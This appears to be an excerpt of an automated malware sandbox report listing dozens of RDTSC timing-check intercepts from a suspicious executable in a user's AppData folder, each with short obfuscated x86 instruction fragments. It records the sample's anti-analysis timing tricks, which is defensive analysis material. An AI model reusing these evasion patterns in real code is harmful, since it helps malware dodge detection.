Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A7071E second address: 4A70724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A70724 second address: 4A7075F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 mov di, B68Ch 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F2738E98EF1h 0x00000016 adc al, 00000066h 0x00000019 jmp 00007F2738E98EF1h 0x0000001e popfd 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A7075F second address: 4A70763 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A70763 second address: 4A707B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ecx 0x00000008 jmp 00007F2738E98EF8h 0x0000000d push eax 0x0000000e jmp 00007F2738E98EEBh 0x00000013 xchg eax, ecx 0x00000014 jmp 00007F2738E98EF6h 0x00000019 mov eax, dword ptr [774365FCh] 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov edx, 00F298B0h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A707B5 second address: 4A707BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A707BA second address: 4A7082A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F2738E98EF0h 0x0000000b sub esi, 20BB38F8h 0x00000011 jmp 00007F2738E98EEBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a test eax, eax 0x0000001c jmp 00007F2738E98EF6h 0x00000021 je 00007F27AB7DC04Fh 0x00000027 pushad 0x00000028 call 00007F2738E98EEEh 0x0000002d mov bx, si 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov ecx, eax 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F2738E98EEFh 0x0000003b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A7082A second address: 4A7087A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ch, bh 0x00000005 mov di, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, dword ptr [ebp+08h] 0x0000000e jmp 00007F2738B89E13h 0x00000013 and ecx, 1Fh 0x00000016 jmp 00007F2738B89E16h 0x0000001b ror eax, cl 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 call 00007F2738B89E0Dh 0x00000025 pop esi 0x00000026 push ebx 0x00000027 pop ecx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A7087A second address: 4A708CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a jmp 00007F2738E98EF0h 0x0000000f retn 0004h 0x00000012 nop 0x00000013 mov esi, eax 0x00000015 lea eax, dword ptr [ebp-08h] 0x00000018 xor esi, dword ptr [00302014h] 0x0000001e push eax 0x0000001f push eax 0x00000020 push eax 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 push eax 0x00000025 call 00007F273D649792h 0x0000002a push FFFFFFFEh 0x0000002c pushad 0x0000002d mov edx, eax 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F2738E98EF8h 0x00000036 sub eax, 75F54E68h 0x0000003c jmp 00007F2738E98EEBh 0x00000041 popfd 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A708CF second address: 4A709C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 mov si, CDF1h 0x0000000c jmp 00007F2738B89E0Eh 0x00000011 popad 0x00000012 ret 0x00000013 nop 0x00000014 push eax 0x00000015 call 00007F273D33A6FAh 0x0000001a mov edi, edi 0x0000001c jmp 00007F2738B89E10h 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 mov al, 71h 0x00000025 pushfd 0x00000026 jmp 00007F2738B89E13h 0x0000002b or cx, 77BEh 0x00000030 jmp 00007F2738B89E19h 0x00000035 popfd 0x00000036 popad 0x00000037 push eax 0x00000038 pushad 0x00000039 pushfd 0x0000003a jmp 00007F2738B89E17h 0x0000003f sub ecx, 1BCB99CEh 0x00000045 jmp 00007F2738B89E19h 0x0000004a popfd 0x0000004b pushfd 0x0000004c jmp 00007F2738B89E10h 0x00000051 sbb cx, 4A48h 0x00000056 jmp 00007F2738B89E0Bh 0x0000005b popfd 0x0000005c popad 0x0000005d xchg eax, ebp 0x0000005e jmp 00007F2738B89E16h 0x00000063 mov ebp, esp 0x00000065 pushad 0x00000066 movzx ecx, bx 0x00000069 mov esi, ebx 0x0000006b popad 0x0000006c pop ebp 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F2738B89E10h 0x00000074 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A709C5 second address: 4A709CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A709CB second address: 4A709CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A200A2 second address: 4A200B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 push ecx 0x00000007 pop edi 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A200B5 second address: 4A200BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A200BB second address: 4A200CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738E98EEDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A200CC second address: 4A200D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A201E4 second address: 4A201EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A201EA second address: 4A20218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2738B89E17h 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20218 second address: 4A20255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2738E98EEFh 0x00000009 sub esi, 064D379Eh 0x0000000f jmp 00007F2738E98EF9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20255 second address: 4A2025B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A2025B second address: 4A202FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c jmp 00007F2738E98EF0h 0x00000011 test esi, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F2738E98EEEh 0x0000001a adc ecx, 5C9EE328h 0x00000020 jmp 00007F2738E98EEBh 0x00000025 popfd 0x00000026 mov ebx, eax 0x00000028 popad 0x00000029 je 00007F27AB827254h 0x0000002f jmp 00007F2738E98EF2h 0x00000034 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003b jmp 00007F2738E98EF0h 0x00000040 je 00007F27AB82723Bh 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 pushfd 0x0000004a jmp 00007F2738E98EECh 0x0000004f and ah, FFFFFFE8h 0x00000052 jmp 00007F2738E98EEBh 0x00000057 popfd 0x00000058 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A202FB second address: 4A203AD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2738B89E18h 0x00000008 or cl, 00000048h 0x0000000b jmp 00007F2738B89E0Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 movzx ecx, dx 0x00000016 popad 0x00000017 mov edx, dword ptr [esi+44h] 0x0000001a jmp 00007F2738B89E0Bh 0x0000001f or edx, dword ptr [ebp+0Ch] 0x00000022 pushad 0x00000023 push esi 0x00000024 mov eax, edi 0x00000026 pop edx 0x00000027 pushfd 0x00000028 jmp 00007F2738B89E0Ch 0x0000002d sbb ch, FFFFFFD8h 0x00000030 jmp 00007F2738B89E0Bh 0x00000035 popfd 0x00000036 popad 0x00000037 test edx, 61000000h 0x0000003d jmp 00007F2738B89E16h 0x00000042 jne 00007F27AB518114h 0x00000048 jmp 00007F2738B89E10h 0x0000004d test byte ptr [esi+48h], 00000001h 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F2738B89E17h 0x00000058 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A203AD second address: 4A203B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A203B3 second address: 4A203D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F27AB5180E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A203D0 second address: 4A203D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A203D4 second address: 4A203EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A107FC second address: 4A10862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c pushfd 0x0000000d jmp 00007F2738E98EF3h 0x00000012 jmp 00007F2738E98EF3h 0x00000017 popfd 0x00000018 pop ecx 0x00000019 pushad 0x0000001a mov dl, EFh 0x0000001c push eax 0x0000001d pop ebx 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F2738E98EEDh 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F2738E98EEDh 0x0000002e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10862 second address: 4A10934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007F2738B89E0Ch 0x00000011 movzx ecx, di 0x00000014 pop edx 0x00000015 jmp 00007F2738B89E0Ch 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e jmp 00007F2738B89E10h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 call 00007F2738B89E0Eh 0x0000002a jmp 00007F2738B89E12h 0x0000002f pop ecx 0x00000030 pushfd 0x00000031 jmp 00007F2738B89E0Bh 0x00000036 jmp 00007F2738B89E13h 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F2738B89E19h 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 mov si, di 0x0000004a pushfd 0x0000004b jmp 00007F2738B89E0Fh 0x00000050 jmp 00007F2738B89E13h 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10934 second address: 4A1098A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F2738E98EEEh 0x0000000f push eax 0x00000010 jmp 00007F2738E98EEBh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov cl, 42h 0x00000019 push eax 0x0000001a push edx 0x0000001b call 00007F2738E98EF7h 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A1098A second address: 4A10996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov esi, dword ptr [ebp+08h] 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10996 second address: 4A109EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738E98EECh 0x00000009 popad 0x0000000a jmp 00007F2738E98EF2h 0x0000000f popad 0x00000010 sub ebx, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov cx, D819h 0x00000019 pushfd 0x0000001a jmp 00007F2738E98EF6h 0x0000001f sbb si, ADA8h 0x00000024 jmp 00007F2738E98EEBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A109EC second address: 4A10AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F2738B89E0Eh 0x00000010 je 00007F27AB51F77Bh 0x00000016 jmp 00007F2738B89E10h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007F2738B89E10h 0x00000027 mov ecx, esi 0x00000029 pushad 0x0000002a mov edx, ecx 0x0000002c call 00007F2738B89E0Ah 0x00000031 push esi 0x00000032 pop ebx 0x00000033 pop eax 0x00000034 popad 0x00000035 je 00007F27AB51F750h 0x0000003b jmp 00007F2738B89E0Dh 0x00000040 test byte ptr [77436968h], 00000002h 0x00000047 jmp 00007F2738B89E0Eh 0x0000004c jne 00007F27AB51F73Bh 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F2738B89E17h 0x00000059 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10AA0 second address: 4A10B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 jmp 00007F2738E98EEBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edx, dword ptr [ebp+0Ch] 0x00000010 pushad 0x00000011 mov di, cx 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 call 00007F2738E98EF8h 0x0000001e mov dx, cx 0x00000021 pop eax 0x00000022 call 00007F2738E98EF7h 0x00000027 pushfd 0x00000028 jmp 00007F2738E98EF8h 0x0000002d and cl, FFFFFFA8h 0x00000030 jmp 00007F2738E98EEBh 0x00000035 popfd 0x00000036 pop eax 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007F2738E98EF6h 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F2738E98EEDh 0x00000046 sbb cx, 3B76h 0x0000004b jmp 00007F2738E98EF1h 0x00000050 popfd 0x00000051 popad 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 mov edx, esi 0x00000056 mov dl, ch 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F2738E98EF1h 0x00000061 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10B76 second address: 4A10BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, AA99h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2738B89E11h 0x00000014 sub eax, 4C5BB0E6h 0x0000001a jmp 00007F2738B89E11h 0x0000001f popfd 0x00000020 movzx eax, bx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10BF8 second address: 4A10C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2738E98EEDh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10C19 second address: 4A10C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b mov ecx, 3F2D7D43h 0x00000010 call 00007F2738B89E18h 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov esp, ebp 0x00000019 jmp 00007F2738B89E0Dh 0x0000001e pop ebp 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20DDA second address: 4A20E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ecx, 1F6336E9h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20E00 second address: 4A20E04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20E04 second address: 4A20E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, B42Bh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, D8D2h 0x00000011 pushfd 0x00000012 jmp 00007F2738E98EF3h 0x00000017 jmp 00007F2738E98EF3h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov eax, ebx 0x00000024 jmp 00007F2738E98EF7h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20B46 second address: 4A20B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20B4A second address: 4A20B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20B4E second address: 4A20B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20B54 second address: 4A20BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F2738E98EF4h 0x00000010 pushfd 0x00000011 jmp 00007F2738E98EF2h 0x00000016 add eax, 421F5A88h 0x0000001c jmp 00007F2738E98EEBh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F2738E98EF9h 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F2738E98EEEh 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F2738E98EF7h 0x00000038 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20BEB second address: 4A20C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F2738B89E0Bh 0x0000000b or ecx, 5C25318Eh 0x00000011 jmp 00007F2738B89E19h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20C25 second address: 4A20C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20C2C second address: 4A20C41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E11h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20C41 second address: 4A20C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4AA068E second address: 4AA0694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4AA0694 second address: 4AA0698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A909B4 second address: 4A90A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dl, ah 0x0000000d pushfd 0x0000000e jmp 00007F2738B89E19h 0x00000013 jmp 00007F2738B89E0Bh 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2738B89E14h 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A07 second address: 4A90A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2738E98EF6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A34 second address: 4A90A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A3C second address: 4A90A41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A41 second address: 4A90A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A47 second address: 4A90A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A55 second address: 4A90A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A59 second address: 4A90A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A907EB second address: 4A9083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2738B89E0Fh 0x00000009 add si, 8A3Eh 0x0000000e jmp 00007F2738B89E19h 0x00000013 popfd 0x00000014 mov cx, 9187h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov dx, FF9Eh 0x00000021 mov ah, dh 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F2738B89E0Dh 0x0000002c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A9083D second address: 4A90843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90843 second address: 4A90847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90847 second address: 4A90875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F2738E98EEFh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2738E98EF0h 0x00000019 rdtsc
